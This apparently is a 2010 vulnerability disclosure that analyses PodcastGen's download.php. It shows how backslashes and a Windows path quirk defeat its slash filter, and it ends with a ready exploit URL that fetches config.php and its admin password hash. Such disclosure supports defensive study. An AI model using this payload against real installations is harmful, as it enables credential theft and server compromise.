Vulnerable file is download.php, let's start from lines 25-27: ------------------------------------------------------- 25. $filename = $_GET['filename']; 26. 27. $filename = eregi_replace("/", "", $filename); ------------------------------------------------------- so, PHP will strip every slash in the filename variable.. but under Windows that doesn't matter, because we can use Back-slash ( \ ). Ok, that was simple, than comes the real challenge.. ------------------------------------------------------- 33. if (file_exists("$filename_path") ) { // check real existence of the file. A void possible cross-site scripting attacks 34. 35. $file_media = explode(".",$filename); //divide filename from extension 36. 37. $fileData = checkFileType($file_media[1],$podcast_filetypes,$filemim etypes); ------------------------------------------------------- no prob with line 33 if the file real exists but on line 37 there is a call to c heckFileType: ------------------------------------------------------- 15. function checkFileType ($filetype,$podcast_filetypes,$filemimetypes) { 16. $i=0; 17. $bool=false; 18. $fileData = array(); 19. 20. while (($i < sizeof($podcast_filetypes)) && $bool==false) { 21. if ($filetype==$podcast_filetypes[$i]) { 22. $fileData[0]=$podcast_filetypes[$i]; 23. $fileData[1]=$filemimetypes[$i]; 24. $bool=true; 25. } 26. $i+=1; 27. } 28. return $fileData; 29.} ------------------------------------------------------- and essentially checks if the string after the first dot is in the list of suppo rted media; <offtopic> not usefull for this vuln, but wanna hilight you a thing.. supported file ext are stored in supported_media.php in this format: ------------------------------------------------------- 18. $podcast_filetypes = array(); //filetypes array to handle multiple filetypes 19. 20. $podcast_filetypes[0]="mp3"; ------------------------------------------------------- if the author forget to declare the new array variable (18), it is possible to i nsert a fake extension if register_globals is turned on.. </offtopic> back to vuln, i ha ve discovered that windows, while accessing to nested dirs do es not checks if every name of dir provided exists, just checks if the result is true or false.. for example, see that cmd l ist: ------------------------------------------------------- Z:\media\AA845DA3845D72B5>mkdir tmp Z:\media\AA845DA3845D72B5>cd tmp Z:\media\AA845DA3845D72B5\tmp>dir Il volume nell'unità Z non ha etichetta. Numero di serie del volume: 0000-0000 Directory di Z:\media\AA845DA3845D72B5\tmp 09/03/2010 13.33 <DIR> . 09/03/2010 13.33 <DIR> .. 0 File 0 byte 2 Directory 299.372.544 byte disponibili Z:\media\AA845DA3845D72B5\tmp> ------------------------------------------------------- so, new dir is empty but.. ------------------------------------------------------- Z:\media\AA845DA3845D72B5\tmp>cd donno\wanna\write\..\..\..\..\ Z:\media\AA845DA3845D72B5> ------------------------------------------------------- Win does not return errors, just go up one dir. Now we are ready to exploit podc astgen with an url like that: http://www.example.com/podcastgen/download.php?filename=.mp3.\..\..\config.php and download the config file with hashed admin password, that if cracked can lea d to a remote code execution. [BlackHawk - 09/03/2010 - Some right reserved (http://creativecommons.org/licens es/by-nc-sa/2.5/it/) ]